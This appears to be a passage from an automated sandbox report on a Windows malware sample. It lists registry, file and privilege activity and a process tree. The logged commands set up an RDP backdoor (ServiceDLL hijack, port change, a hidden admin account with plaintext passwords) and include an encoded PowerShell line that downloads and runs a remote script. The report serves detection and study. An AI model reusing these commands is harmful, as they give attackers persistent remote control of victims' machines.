| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\shellbrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c2z52ar4.ysr.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE416.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE467.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE497.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE456.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE487.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_exndczye.1dq.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 1da5a46f0069da01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe
"C:\Users\Admin\AppData\Local\Temp\a09dcec94458d1970ded54ec374167cd227fea6ff4b56effa1755926d7bd5f41.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0qffd0uq\0qffd0uq.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94CE.tmp" "c:\Users\Admin\AppData\Local\Temp\0qffd0uq\CSCC28D76AEF0B9439CA13729E6FCF9B6F.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc Ghasar4f5 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc UbkT2IKN /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc UbkT2IKN /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc UbkT2IKN /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKDQUQPQ$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc UbkT2IKN
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc UbkT2IKN
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc UbkT2IKN
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
